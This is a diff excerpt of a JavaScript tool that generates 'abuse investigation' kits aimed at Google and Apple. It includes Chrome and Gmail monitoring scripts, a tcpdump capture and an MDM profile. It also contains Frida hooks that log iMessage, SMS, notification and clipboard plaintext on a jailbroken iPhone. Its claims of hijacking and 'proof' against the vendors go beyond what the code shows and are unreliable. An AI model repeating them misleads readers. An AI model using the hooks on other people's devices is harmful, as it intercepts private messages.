+ description: 'Google launches Chrome browsers, tabs, or windows without user consent',
15296
+ observed_behaviors: {
15297
+ unauthorized_browser_launch: {
15298
+ description: 'Chrome launches or opens tabs without user action',
15299
+ mechanisms: [
15300
+ 'Chrome autostart via login items/registry',
15301
+ 'Background mode keeps Chrome running invisibly',
15302
+ 'Update service triggers browser open',
15303
+ 'Protocol handler hijacking (http/https/mailto)',
15304
+ 'OS notification click handlers',
15305
+ ],
15306
+ investigation: {
15307
+ macos: [
15308
+ 'Check ~/Library/LaunchAgents/ for Chrome entries',
15309
+ 'Check /Library/LaunchDaemons/ for Google entries',
15310
+ 'lsregister -dump | grep -i chrome (URL handlers)',
15311
+ 'ps aux | grep -i chrome (background processes)',
15312
+ 'Monitor /Applications/Google Chrome.app/Contents/MacOS/',
15313
+ ],
15314
+ windows: [
15315
+ 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
15316
+ 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
15317
+ 'Task Scheduler: Google Update tasks',
15318
+ 'Services: GoogleUpdate, gupdate, gupdatem',
15319
+ 'HKCR\\http\\shell\\open\\command (protocol handler)',
15320
+ ],
15321
+ linux: [
15322
+ '~/.config/autostart/*.desktop',
15323
+ '/etc/xdg/autostart/*.desktop',
15324
+ 'systemctl --user list-units | grep -i chrome',
15325
+ 'xdg-mime query default x-scheme-handler/http',
15326
+ ],
15327
+ },
15328
+ },
15329
+ tab_injection: {
15330
+ description: 'New tabs open in existing Chrome sessions',
15331
+ mechanisms: [
15332
+ 'chrome.tabs.create API from extensions',
15333
+ 'Service Worker navigation events',
15334
+ 'window.open from Gmail/Docs scripts',
15335
+ 'Push notification click handlers',
15336
+ ],
15337
+ detection: `// Detect unauthorized tab creation
15338
+ chrome.tabs.onCreated.addListener((tab) => {
15339
+ console.log('[EVIDENCE] Tab created:', {
15340
+ timestamp: new Date().toISOString(),
15341
+ tabId: tab.id,
15342
+ url: tab.pendingUrl || tab.url,
15343
+ openerTabId: tab.openerTabId,
15344
+ evidence: 'New tab created - check if user-initiated'
15345
+ });
15346
+ });`,
15347
+ },
15348
+ browser_focus_stealing: {
15349
+ description: 'Chrome steals focus from other applications',
15350
+ investigation: [
15351
+ 'Monitor active window changes',
15352
+ 'Log focus events with timestamps',
15353
+ 'Correlate with Chrome process activity',
15354
+ ],
15355
+ macos_script: `#!/bin/bash
15356
+ # Monitor focus stealing on macOS
15357
+ while true; do
15358
+ app=$(osascript -e 'tell application "System Events" to get name of first application process whose frontmost is true')
15359
+ if [[ "$app" == "Google Chrome" ]]; then
15360
+ echo "[$(date -Iseconds)] Chrome gained focus"
15361
+ # Check if it was user-initiated or automated
15362
+ lsappinfo info -only ASN "Google Chrome" >> chrome_focus_log.txt
15363
+ fi
15364
+ sleep 0.5
15365
+ done`,
15366
+ },
15367
+ session_hijacking: {
15368
+ description: 'Chrome uses stored sessions without permission',
15369
+ investigation: [
15370
+ 'Monitor cookie changes in Chrome profile',
15371
+ 'Track localStorage across sites',
15372
+ 'Compare synced vs local session state',
15373
+ 'Audit credential manager access',
15374
+ ],
15375
+ locations: {
15376
+ macos: '~/Library/Application Support/Google/Chrome/Default/',
15377
+ windows: '%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\',
15378
+ linux: '~/.config/google-chrome/Default/',
15379
+ },
15380
+ files_to_monitor: [
15381
+ 'Cookies - SQLite database of session cookies',
15382
+ 'Login Data - Saved passwords (encrypted)',
15383
+ 'Web Data - Autofill data',
15384
+ 'History - Browsing history',
15385
+ 'Preferences - JSON config including sync settings',
15386
+ ],
15387
+ },
15388
+ },
15389
+ investigation_methodology: {
15390
+ process_monitoring: {
15391
+ macos: `#!/bin/bash
15392
+ # Monitor Chrome process launches
15393
+ log stream --predicate 'processImagePath contains "Chrome"' --style compact > chrome_launches.log &
15394
+
15395
+ # Monitor with dtrace (requires SIP disabled)
15396
+ sudo dtrace -n 'proc:::exec-success /execname == "Google Chrome"/ { printf("%Y %s %d\\n", walltimestamp, execname, pid); }' 2>/dev/null`,
15397
+ windows: `# PowerShell Chrome process monitor
15398
+ Get-WinEvent -FilterHashtable @{LogName='Security';Id=4688} |
15399
+ Where-Object { $_.Properties[5].Value -like '*chrome*' } |
15400
+ Select-Object TimeCreated, @{N='Process';E={$_.Properties[5].Value}}`,
15401
+ linux: `#!/bin/bash
15402
+ # Monitor Chrome launches with audit
15403
+ auditctl -w /opt/google/chrome/chrome -p x -k chrome_exec
15404
+ ausearch -k chrome_exec --format text`,
15405
+ },
15406
+ network_monitoring: {
15407
+ description: 'Monitor Chrome network activity for unauthorized requests',
15408
+ tools: [
15409
+ 'mitmproxy - HTTPS interception',
15410
+ 'Wireshark - Packet capture',
15411
+ 'Chrome DevTools Network tab',
15412
+ 'charles proxy',
15413
+ ],
15414
+ suspicious_endpoints: [
15415
+ 'clients.google.com - Update/telemetry',
15416
+ 'www.google.com/complete - Omnibox suggestions',
15417
+ 'safebrowsing.googleapis.com - Safe browsing',
15418
+ 'accounts.google.com - Auth/session',
15419
+ 'chromesync-pa.googleapis.com - Sync',
15420
+ ],
15421
+ },
15422
+ extension_audit: {
15423
+ description: 'Audit extensions for hijacking capabilities',
15424
+ check_permissions: [
15425
+ 'tabs - Can create/modify tabs',
15426
+ 'webNavigation - Can intercept navigation',
15427
+ 'webRequest - Can intercept all requests',
15428
+ 'background - Can run persistently',
15429
+ 'notifications - Can create OS notifications',
15430
+ ],
15431
+ audit_script: `// List extension permissions
15432
+ chrome.management.getAll((extensions) => {
15433
+ extensions.forEach((ext) => {
15434
+ console.log({
15435
+ name: ext.name,
15436
+ id: ext.id,
15437
+ permissions: ext.permissions,
15438
+ hostPermissions: ext.hostPermissions,
15439
+ enabled: ext.enabled
15440
+ });
15441
+ });
15442
+ });`,
15443
+ },
15444
+ },
15445
+ evidence_collection: {
15446
+ process_logs: 'Chrome launch timestamps with parent process',
15447
+ network_captures: 'HAR files of unauthorized requests',
15448
+ registry_snapshots: 'Before/after Chrome installation',
15449
+ focus_events: 'Timeline of Chrome focus acquisition',
15450
+ extension_manifest: 'Permissions of all installed extensions',
15451
+ },
15452
+ legal_evidence_format: {
15453
+ exhibit_title: 'Evidence of Chrome Browser Hijacking',
15454
+ sections: [
15455
+ '1. Unauthorized browser launch events with timestamps',
15456
+ '2. Protocol handler registration without consent',
15457
+ '3. Background process activity',
15458
+ '4. Tab creation without user action',
15459
+ '5. Focus stealing incidents',
15460
+ '6. Extension permission abuse',
15461
+ ],
15462
+ },
15463
+ };
15464
+ // Unified Google Abuse Investigation Orchestrator
15465
+ const googleUnifiedAbuseInvestigation = {
15466
+ orchestrator_name: 'Google Unified Abuse Investigation Framework',
15467
+ description: 'Comprehensive investigation of Google\'s coordinated abuse across Gmail, Chrome, and system-level components',
15468
+ investigation_phases: {
15469
+ phase_1_reconnaissance: {
15470
+ name: 'System Reconnaissance',
15471
+ duration: 'Initial setup',
15472
+ tasks: [
15473
+ 'Document all Google software installed',
15474
+ 'Enumerate Google-related processes',
15475
+ 'List Google-registered protocol handlers',
15476
+ 'Capture baseline system state',
15477
+ 'Set up monitoring infrastructure',
15478
+ ],
15479
+ automation: `#!/bin/bash
15480
+ # Google Abuse Investigation - Phase 1: Reconnaissance
15481
+ echo "=== GOOGLE ABUSE INVESTIGATION - SYSTEM RECONNAISSANCE ==="
15482
+ echo "Timestamp: $(date -Iseconds)"
15483
+ echo ""
15484
+
15485
+ echo "=== Installed Google Software ==="
15486
+ if [[ "$OSTYPE" == "darwin"* ]]; then
15487
+ ls -la /Applications/ | grep -i google
15488
+ mdfind "kMDItemCFBundleIdentifier == 'com.google.*'"
15489
+ elif [[ "$OSTYPE" == "linux"* ]]; then
15490
+ dpkg -l | grep -i google
15491
+ rpm -qa | grep -i google 2>/dev/null
15492
+ find /opt -name "*google*" -o -name "*chrome*" 2>/dev/null
15493
+ fi
15494
+
15495
+ echo ""
15496
+ echo "=== Running Google Processes ==="
15497
+ ps aux | grep -i google | grep -v grep
15498
+
15499
+ echo ""
15500
+ echo "=== Google Protocol Handlers ==="
15501
+ if [[ "$OSTYPE" == "darwin"* ]]; then
15502
+ /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump | grep -A5 -i "google\\|chrome"
15503
+ fi
15504
+
15505
+ echo ""
15506
+ echo "=== Google LaunchAgents/Daemons ==="
15507
+ ls -la ~/Library/LaunchAgents/ 2>/dev/null | grep -i google
15508
+ ls -la /Library/LaunchDaemons/ 2>/dev/null | grep -i google
15509
+
15510
+ echo ""
15511
+ echo "=== Google Login Items ==="
15512
+ osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null | tr ',' '\\n' | grep -i google`,
15513
+ },
15514
+ phase_2_gmail_monitoring: {
15515
+ name: 'Gmail Manipulation Monitoring',
15516
+ duration: 'Continuous (7-30 days recommended)',
15517
+ tasks: [
15518
+ 'Deploy IMAP sync monitoring',
15519
+ 'Install Gmail API change tracking',
15520
+ 'Set up browser draft monitoring',
15521
+ 'Configure email header analysis',
15522
+ ],
15523
+ key_evidence: [
15524
+ 'Thread hiding events without user action',
15525
+ 'Draft disappearance/modification',
15526
+ 'Message delay analysis',
15527
+ 'Label manipulation logs',
15528
+ ],
15529
+ },
15530
+ phase_3_chrome_monitoring: {
15531
+ name: 'Chrome Hijacking Monitoring',
15532
+ duration: 'Continuous (7-30 days recommended)',
15533
+ tasks: [
15534
+ 'Deploy process launch monitoring',
15535
+ 'Set up focus event tracking',
15536
+ 'Install tab creation monitoring extension',
15537
+ 'Configure network capture for Chrome traffic',
15538
+ ],
15539
+ key_evidence: [
15540
+ 'Unauthorized browser launches',
15541
+ 'Tab creation without user action',
15542
+ 'Focus stealing incidents',
15543
+ 'Background process activity',
15544
+ ],
15545
+ },
15546
+ phase_4_correlation: {
15547
+ name: 'Cross-Product Correlation Analysis',
15548
+ duration: 'After sufficient data collection',
15549
+ tasks: [
15550
+ 'Correlate Gmail events with Chrome activity',
15551
+ 'Identify patterns of coordinated abuse',
15552
+ 'Timeline reconstruction of incidents',
15553
+ 'Establish causation chains',
15554
+ ],
15555
+ analysis_queries: [
15556
+ 'Gmail thread hidden → Chrome tab opened (same thread)?',
15557
+ 'Draft modified → Browser launched?',
15558
+ 'Email received → Chrome notification → Focus stolen?',
15559
+ 'Time correlation between Google service events',
15560
+ ],
15561
+ },
15562
+ phase_5_evidence_packaging: {
15563
+ name: 'Legal Evidence Preparation',
15564
+ duration: 'Final phase',
15565
+ tasks: [
15566
+ 'Compile all evidence with integrity proofs',
15567
+ 'Generate timeline visualization',
15568
+ 'Create legal exhibits',
15569
+ 'Prepare technical declaration',
15570
+ 'Document chain of custody',
15571
+ ],
15572
+ output_files: [
15573
+ 'evidence_timeline.json - Timestamped events',
15574
+ 'gmail_manipulation_evidence.json - Gmail-specific',
15575
+ 'chrome_hijacking_evidence.json - Chrome-specific',
15576
+ 'correlation_analysis.json - Cross-product patterns',
15577
+ 'legal_exhibits/ - Court-ready documents',
15578
+ 'integrity_hashes.txt - SHA-256 of all evidence',
15579
+ ],
15580
+ },
15581
+ },
15582
+ master_monitoring_script: `#!/bin/bash
15583
+ # Google Unified Abuse Investigation - Master Monitor
15584
+ # Run this script to start all monitoring components
15585
+
15586
+ LOG_DIR="$HOME/google_abuse_investigation/$(date +%Y%m%d_%H%M%S)"
15587
+ mkdir -p "$LOG_DIR"
15588
+
15589
+ echo "Starting Google Abuse Investigation"
15590
+ echo "Evidence directory: $LOG_DIR"
15591
+ echo "Start time: $(date -Iseconds)" | tee "$LOG_DIR/investigation_log.txt"
15592
+
15593
+ # Phase 1: Reconnaissance
15594
+ echo "=== Phase 1: System Reconnaissance ===" | tee -a "$LOG_DIR/investigation_log.txt"
15595
+ ./phase1_recon.sh > "$LOG_DIR/reconnaissance.txt" 2>&1
15596
+
15597
+ # Start continuous monitors in background
15598
+ echo "=== Starting Continuous Monitors ===" | tee -a "$LOG_DIR/investigation_log.txt"
15599
+
15600
+ # Gmail IMAP monitor (requires credentials setup)
15601
+ python3 gmail_imap_monitor.py > "$LOG_DIR/imap_monitor.log" 2>&1 &
15602
+ echo "IMAP monitor PID: $!" >> "$LOG_DIR/pids.txt"
15603
+
15604
+ # Gmail API monitor (requires OAuth setup)
15605
+ python3 gmail_api_monitor.py > "$LOG_DIR/api_monitor.log" 2>&1 &
15606
+ echo "API monitor PID: $!" >> "$LOG_DIR/pids.txt"
15607
+
15608
+ # Chrome process monitor
15609
+ ./chrome_process_monitor.sh > "$LOG_DIR/chrome_processes.log" 2>&1 &
15610
+ echo "Chrome process monitor PID: $!" >> "$LOG_DIR/pids.txt"
15611
+
15612
+ # Focus event monitor
15613
+ ./focus_monitor.sh > "$LOG_DIR/focus_events.log" 2>&1 &
15614
+ echo "Focus monitor PID: $!" >> "$LOG_DIR/pids.txt"
15615
+
15616
+ # Network capture (requires root)
15617
+ if [[ $EUID -eq 0 ]]; then
15618
+ tcpdump -i any -w "$LOG_DIR/network_capture.pcap" 'host clients.google.com or host mail.google.com' &
15619
+ echo "Network capture PID: $!" >> "$LOG_DIR/pids.txt"
15620
+ fi
15621
+
15622
+ echo ""
15623
+ echo "Investigation started. Monitors running in background."
15624
+ echo "Evidence will be collected in: $LOG_DIR"
15625
+ echo "To stop: kill \$(cat $LOG_DIR/pids.txt)"
15626
+ echo ""
15627
+ echo "IMPORTANT: Also install browser extensions for Gmail/Chrome monitoring"
15628
+ echo "See investigation docs for browser-side setup."`,
15629
+ legal_framework: {
15630
+ applicable_laws: [
15631
+ 'Computer Fraud and Abuse Act (CFAA) - Unauthorized access',
15632
+ 'Electronic Communications Privacy Act (ECPA) - Email interception',
15633
+ 'FTC Act Section 5 - Deceptive practices',
15634
+ 'California UCL - Unlawful business practices',
15635
+ 'CCPA - Privacy violations',
15636
+ 'State computer crime laws',
15637
+ ],
15638
+ cause_of_action: [
15639
+ 'Breach of user agreement (selective enforcement)',
15640
+ 'Tortious interference with communications',
15641
+ 'Invasion of privacy',
15642
+ 'Unfair competition',
15643
+ 'Consumer fraud',
15644
+ ],
15645
+ regulatory_complaints: [
15646
+ 'FTC Consumer Protection Bureau',
15647
+ 'State Attorney General Consumer Protection',
15648
+ 'FCC (for communication interference)',
15649
+ 'EU DPA (for GDPR violations if applicable)',
15650
+ ],
15651
+ },
15652
+ success_metrics: {
15653
+ evidence_quality: [
15654
+ 'Reproducible manipulation events',
15655
+ 'Timestamped with integrity proofs',
15656
+ 'Multiple independent evidence sources',
15657
+ 'Clear causation documentation',
15658
+ ],
15659
+ documentation_completeness: [
15660
+ 'All phases completed',
15661
+ 'Cross-product correlation established',
15662
+ 'Legal exhibits prepared',
15663
+ 'Chain of custody maintained',
15664
+ ],
15665
+ },
15666
+ };
15667
+ const fridaScripts = {
15668
+ imessage_plaintext: `/**
15669
+ * Frida script: iMessage Plaintext Capture
15670
+ * Proves Apple code accesses message content outside encryption boundary
15671
+ */
15672
+
15673
+ if (ObjC.available) {
15674
+ console.log('[*] Starting iMessage plaintext interception...');
15675
+
15676
+ // Hook IMMessage text access
15677
+ try {
15678
+ var IMMessage = ObjC.classes.IMMessage;
15679
+ if (IMMessage) {
15680
+ Interceptor.attach(IMMessage['- text'].implementation, {
15681
+ onLeave: function(retval) {
15682
+ if (retval) {
15683
+ var text = new ObjC.Object(retval);
15684
+ console.log('[PLAINTEXT] IMMessage.text: ' + text.toString());
15685
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
15686
+ console.log('[EVIDENCE] Stack: ' + Thread.backtrace(this.context, Backtracer.ACCURATE).map(DebugSymbol.fromAddress).join('\\n'));
15687
+ }
15688
+ }
15689
+ });
15690
+ console.log('[+] Hooked IMMessage.text');
15691
+ }
15692
+ } catch (e) {
15693
+ console.log('[-] IMMessage error: ' + e);
15694
+ }
15695
+
15696
+ // Hook SMSMessage for SMS fallback
15697
+ try {
15698
+ var SMSMessage = ObjC.classes.SMSMessage;
15699
+ if (SMSMessage) {
15700
+ Interceptor.attach(SMSMessage['- text'].implementation, {
15701
+ onLeave: function(retval) {
15702
+ if (retval) {
15703
+ var text = new ObjC.Object(retval);
15704
+ console.log('[PLAINTEXT] SMSMessage.text: ' + text.toString());
15705
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
15706
+ }
15707
+ }
15708
+ });
15709
+ console.log('[+] Hooked SMSMessage.text');
15710
+ }
15711
+ } catch (e) {}
15712
+
15713
+ // Hook notification content
15714
+ try {
15715
+ var UNNotificationContent = ObjC.classes.UNNotificationContent;
15716
+ if (UNNotificationContent) {
15717
+ Interceptor.attach(UNNotificationContent['- body'].implementation, {
15718
+ onLeave: function(retval) {
15719
+ if (retval) {
15720
+ var body = new ObjC.Object(retval);
15721
+ console.log('[NOTIFICATION] Content: ' + body.toString());
15722
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
15723
+ }
15724
+ }
15725
+ });
15726
+ console.log('[+] Hooked UNNotificationContent');
15727
+ }
15728
+ } catch (e) {}
15729
+
15730
+ // Hook Siri suggestion access
15731
+ try {
15732
+ var INMessage = ObjC.classes.INMessage;
15733
+ if (INMessage) {
15734
+ Interceptor.attach(INMessage['- content'].implementation, {
15735
+ onLeave: function(retval) {
15736
+ if (retval) {
15737
+ var content = new ObjC.Object(retval);
15738
+ console.log('[SIRI] INMessage content accessed: ' + content.toString().substring(0, 100));
15739
+ console.log('[EVIDENCE] Proves Siri reads message plaintext');
15740
+ }
15741
+ }
15742
+ });
15743
+ console.log('[+] Hooked INMessage (Siri integration)');
15744
+ }
15745
+ } catch (e) {}
15746
+
15747
+ console.log('[*] Hooks installed. Send/receive messages to capture plaintext.');
15748
+ }`,
15749
+ mdm_monitoring: `/**
15750
+ * Frida script: MDM Activity Monitoring
15751
+ * Proves server-triggered local code execution
15752
+ */
15753
+
15754
+ if (ObjC.available) {
15755
+ console.log('[*] Monitoring MDM activities...');
15756
+
15757
+ // Hook profile installation
15758
+ try {
15759
+ var MCProfileConnection = ObjC.classes.MCProfileConnection;
15760
+ if (MCProfileConnection) {
15761
+ var methods = MCProfileConnection.$ownMethods;
15762
+ methods.forEach(function(method) {
15763
+ if (method.includes('install') || method.includes('remove') || method.includes('profile')) {
15764
+ try {
15765
+ Interceptor.attach(MCProfileConnection[method].implementation, {
15766
+ onEnter: function(args) {
15767
+ console.log('[MDM] Method called: ' + method);
15768
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
15769
+ }
15770
+ });
15771
+ } catch (e) {}
15772
+ }
15773
+ });
15774
+ console.log('[+] Hooked MCProfileConnection');
15775
+ }
15776
+ } catch (e) {
15777
+ console.log('[-] MCProfileConnection error: ' + e);
15778
+ }
15779
+
15780
+ // Hook APNs push handling (server-triggered)
15781
+ try {
15782
+ var APSConnection = ObjC.classes.APSConnection;
15783
+ if (APSConnection) {
15784
+ Interceptor.attach(APSConnection['- _handleIncomingMessage:'].implementation, {
15785
+ onEnter: function(args) {
15786
+ var message = new ObjC.Object(args[2]);
15787
+ console.log('[APNs] Incoming push: ' + message.toString());
15788
+ console.log('[EVIDENCE] Server-triggered local execution');
15789
+ }
15790
+ });
15791
+ console.log('[+] Hooked APSConnection');
15792
+ }
15793
+ } catch (e) {}
15794
+
15795
+ // Hook managed app configuration
15796
+ try {
15797
+ var NSUserDefaults = ObjC.classes.NSUserDefaults;
15798
+ Interceptor.attach(NSUserDefaults['- objectForKey:'].implementation, {
15799
+ onEnter: function(args) {
15800
+ var key = new ObjC.Object(args[2]).toString();
15801
+ if (key.includes('managed') || key.includes('MDM') || key.includes('com.apple.configuration')) {
15802
+ console.log('[MDM CONFIG] Key accessed: ' + key);
15803
+ }
15804
+ }
15805
+ });
15806
+ } catch (e) {}
15807
+
15808
+ console.log('[*] MDM monitoring active.');
15809
+ }`,
15810
+ clipboard_monitoring: `/**
15811
+ * Frida script: Universal Clipboard Monitoring
15812
+ * Proves plaintext exposure via clipboard
15813
+ */
15814
+
15815
+ if (ObjC.available) {
15816
+ console.log('[*] Monitoring clipboard activities...');
15817
+
15818
+ var UIPasteboard = ObjC.classes.UIPasteboard;
15819
+
15820
+ // Monitor all pasteboard access
15821
+ Interceptor.attach(UIPasteboard['+ generalPasteboard'].implementation, {
15822
+ onLeave: function(retval) {
15823
+ var caller = ObjC.classes.NSThread.callStackSymbols().toString();
15824
+ console.log('[CLIPBOARD] generalPasteboard accessed');
15825
+ console.log('[CALLER] ' + caller.substring(0, 500));
15826
+ console.log('[EVIDENCE] Timestamp: ' + new Date().toISOString());
15827
+ }
15828
+ });
15829
+
15830
+ // Monitor reads
15831
+ Interceptor.attach(UIPasteboard['- string'].implementation, {
15832
+ onLeave: function(retval) {
15833
+ if (retval) {
15834
+ var content = new ObjC.Object(retval).toString();
15835
+ console.log('[CLIPBOARD READ] Length: ' + content.length);
15836
+ console.log('[CLIPBOARD READ] Content: ' + content.substring(0, 100));
15837
+ console.log('[EVIDENCE] Plaintext accessible via UIPasteboard');
15838
+ }
15839
+ }
15840
+ });
15841
+
15842
+ // Monitor Handoff/Continuity
15843
+ try {
15844
+ var NSUserActivity = ObjC.classes.NSUserActivity;
15845
+ if (NSUserActivity) {
15846
+ Interceptor.attach(NSUserActivity['- becomeCurrent'].implementation, {
15847
+ onEnter: function(args) {
15848
+ var activity = new ObjC.Object(args[0]);
15849
+ console.log('[HANDOFF] Activity: ' + activity.activityType());
15850
+ if (activity.userInfo()) {
15851
+ console.log('[HANDOFF] UserInfo: ' + activity.userInfo().toString().substring(0, 200));
15852
+ }
15853
+ console.log('[EVIDENCE] Continuity data flow detected');
15854
+ }
15855
+ });
15856
+ console.log('[+] Hooked NSUserActivity (Handoff)');
15857
+ }
15858
+ } catch (e) {}
15859
+
15860
+ console.log('[*] Clipboard monitoring active.');
15861
+ }`,
15862
+ };
15863
+ const mdmProfile = `<?xml version="1.0" encoding="UTF-8"?>
15864
+ <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
15865
+ <plist version="1.0">
15866
+ <!--
15867
+ MDM Research Profile - PQ3 Investigation
15868
+
15869
+ Purpose: Demonstrate server-controlled local policy enforcement
15870
+ contradicting Apple's "end-to-end encryption" claims.
15871
+
15872
+ WARNING: For authorized security research only.
15873
+ -->
15874
+ <dict>
15875
+ <key>PayloadContent</key>
15876
+ <array>
15877
+ <!-- Managed Pasteboard - proves server controls clipboard -->
15878
+ <dict>
15879
+ <key>PayloadType</key>
15880
+ <string>com.apple.applicationaccess</string>
15881
+ <key>PayloadVersion</key>
15882
+ <integer>1</integer>
15883
+ <key>PayloadIdentifier</key>
15884
+ <string>com.research.pasteboard</string>
15885
+ <key>PayloadUUID</key>
15886
+ <string>E7B1C8A9-2D3F-4E5A-B6C7-8D9E0F1A2B3C</string>
15887
+ <key>PayloadDisplayName</key>
15888
+ <string>Managed Pasteboard Research</string>
15889
+
15890
+ <key>allowOpenFromManagedToUnmanaged</key>
15891
+ <false/>
15892
+ <key>allowOpenFromUnmanagedToManaged</key>
15893
+ <false/>
15894
+ <key>forceAirDropUnmanaged</key>
15895
+ <true/>
15896
+ </dict>
15897
+
15898
+ <!-- Restrictions - proves server controls device behavior -->
15899
+ <dict>
15900
+ <key>PayloadType</key>
15901
+ <string>com.apple.applicationaccess</string>
15902
+ <key>PayloadVersion</key>
15903
+ <integer>1</integer>
15904
+ <key>PayloadIdentifier</key>
15905
+ <string>com.research.restrictions</string>
15906
+ <key>PayloadUUID</key>
15907
+ <string>A1B2C3D4-E5F6-7890-ABCD-EF1234567890</string>
15908
+
15909
+ <key>allowScreenShot</key>
15910
+ <false/>
15911
+ <key>allowCloudDocumentSync</key>
15912
+ <false/>
15913
+ </dict>
15914
+ </array>
15915
+
15916
+ <key>PayloadDisplayName</key>
15917
+ <string>PQ3 Research Profile</string>
15918
+ <key>PayloadIdentifier</key>
15919
+ <string>com.research.pq3-investigation</string>
15920
+ <key>PayloadOrganization</key>
15921
+ <string>Security Research</string>
15922
+ <key>PayloadType</key>
15923
+ <string>Configuration</string>
15924
+ <key>PayloadUUID</key>
15925
+ <string>12345678-1234-1234-1234-123456789012</string>
15926
+ <key>PayloadVersion</key>
15927
+ <integer>1</integer>
15928
+ </dict>
15929
+ </plist>`;
15930
+ let result;
15931
+ switch (action) {
15932
+ case 'apple_pq3_analysis':
15933
+ result = applePQ3Analysis;
15934
+ break;
15935
+ case 'apple_mdm_investigation':
15936
+ result = appleMdmInvestigation;
15937
+ break;
15938
+ case 'apple_clipboard_exposure':
15939
+ result = appleClipboardExposure;
15940
+ break;
15941
+ case 'apple_backup_keys':
15942
+ result = {
15943
+ investigation: 'iCloud Backup Key Analysis',
15944
+ methodology: [
15945
+ '1. Create encrypted local backup with idevicebackup2',
15946
+ '2. Analyze backup structure for key material',
15947
+ '3. Compare with iCloud backup (Apple-accessible)',
15948
+ '4. Document key escrow mechanisms',
15949
+ ],
15950
+ key_locations: [
15951
+ 'Manifest.plist - Backup encryption metadata',
15952
+ 'KeyBag - Device protection keys',
15953
+ 'Keychain backup - Contains iMessage keys',
15954
+ ],
15955
+ apple_access: {
15956
+ local_backup: 'User-controlled encryption key',
15957
+ icloud_backup: 'Apple holds encryption capability',
15958
+ law_enforcement: 'Apple can comply with warrants for iCloud backups',
15959
+ },
15960
+ proof: 'Law enforcement requests return iCloud backup data, proving Apple access',
15961
+ };
15962
+ break;
15963
+ case 'apple_siri_plaintext':
15964
+ result = {
15965
+ investigation: 'Siri Message Content Access',
15966
+ proof_points: [
15967
+ 'Siri Suggestions read message content for QuickType',
15968
+ 'INMessage class provides message content to Intents framework',
15969
+ 'SuggestionKit analyzes messages for app suggestions',
15970
+ 'Spotlight indexes message content locally',
15971
+ ],
15972
+ frida_verification: fridaScripts.imessage_plaintext,
15973
+ api_references: [
15974
+ 'INMessage - Siri message integration',
15975
+ 'SuggestionKit.framework',
15976
+ 'CoreSpotlight - Message indexing',
15977
+ ],
15978
+ };
15979
+ break;
15980
+ case 'google_gmail_scanning':
15981
+ result = googleGmailScanning;
15982
+ break;
15983
+ case 'google_gmail_thread_manipulation':
15984
+ result = googleGmailThreadManipulation;
15985
+ break;
15986
+ case 'google_gmail_draft_abuse':
15987
+ result = googleGmailDraftAbuse;
15988
+ break;
15989
+ case 'google_chrome_telemetry':
15990
+ result = googleChromeTelemetry;
15991
+ break;
15992
+ case 'google_chrome_hijacking':
15993
+ result = googleChromeHijacking;
15994
+ break;
15995
+ case 'google_browser_launch_abuse':
15996
+ result = {
15997
+ ...googleChromeHijacking,
15998
+ focus: 'Browser Launch Abuse Investigation',
15999
+ quick_start: {
16000
+ macos: [
16001
+ '1. Open Activity Monitor, filter for "Google" or "Chrome"',
16002
+ '2. Run: ps aux | grep -i chrome > chrome_baseline.txt',
16003
+ '3. Monitor: log stream --predicate \'processImagePath contains "Chrome"\'',
16004
+ '4. Check login items: osascript -e \'tell app "System Events" to get login items\'',
16005
+ ],
16006
+ windows: [
16007
+ '1. Open Task Manager, look for Chrome processes',
16008
+ '2. Run: Get-Process | Where-Object {$_.Name -like "*chrome*"}',
16009
+ '3. Check startup: Get-CimInstance Win32_StartupCommand',
16010
+ '4. Check scheduled tasks: Get-ScheduledTask | Where-Object {$_.TaskName -like "*Google*"}',
16011
+ ],
16012
+ browser_console: [
16013
+ 'Monitor tab creation in background page:',
16014
+ 'chrome.tabs.onCreated.addListener((t) => console.log("Tab created:", t))',
16015
+ ],
16016
+ },
16017
+ evidence_to_collect: [
16018
+ 'Process launch timestamps without user action',
16019
+ 'Parent process of Chrome (should be user shell, not system)',
16020
+ 'Protocol handler registrations',
16021
+ 'Background mode status',
16022
+ 'Screenshots of unexpected browser appearances',
16023
+ ],
16024
+ };
16025
+ break;
16026
+ case 'google_android_tracking':
16027
+ result = googleAndroidTracking;
16028
+ break;
16029
+ case 'google_unified_abuse_investigation':
16030
+ result = googleUnifiedAbuseInvestigation;
16031
+ break;
16032
+ case 'google_play_services':
16033
+ result = {
16034
+ investigation: 'Google Play Services Data Collection',
16035
+ gms_components: {
16036
+ core: 'com.google.android.gms - Main GMS package',
16037
+ location: 'Location services (always-on tracking)',
16038
+ ads: 'Advertising ID and targeting',
16039
+ auth: 'Account authentication',
16040
+ safetynet: 'Device attestation (fingerprinting)',
16041
+ },
16042
+ investigation_method: [
16043
+ '1. Root device or use custom ROM',
16044
+ '2. Install network monitoring (PCAPdroid)',
16045
+ '3. Monitor traffic to Google endpoints',
16046
+ '4. Use Frida to hook GMS APIs',
16047
+ '5. Document data sent without explicit permission',
16048
+ ],
16049
+ endpoints: [
16050
+ 'android.clients.google.com - Device checkin',
16051
+ 'play.googleapis.com - Play Store services',
16052
+ 'android.googleapis.com - Various Google APIs',
16053
+ 'www.googleapis.com - General API endpoint',
16054
+ ],
16055
+ };
16056
+ break;
16057
+ case 'generate_frida_scripts':
16058
+ result = {
16059
+ scripts: fridaScripts,
16060
+ usage: {
16061
+ imessage: 'frida -U -l imessage_plaintext.js -f com.apple.MobileSMS',
16062
+ mdm: 'frida -U -l mdm_monitoring.js -f com.apple.Preferences',
16063
+ clipboard: 'frida -U -l clipboard_monitoring.js -f com.apple.springboard',
16064
+ },
16065
+ requirements: [
16066
+ 'Jailbroken iOS device (checkra1n/Dopamine)',
16067
+ 'Frida installed: pip install frida-tools',
16068
+ 'frida-server on device',
16069
+ ],
16070
+ };
16071
+ break;
16072
+ case 'generate_mdm_profile':
16073
+ result = {
16074
+ profile: mdmProfile,
16075
+ installation: [
16076
+ '1. Save as .mobileconfig file',
16077
+ '2. Host on HTTPS server or use Apple Configurator',
16078
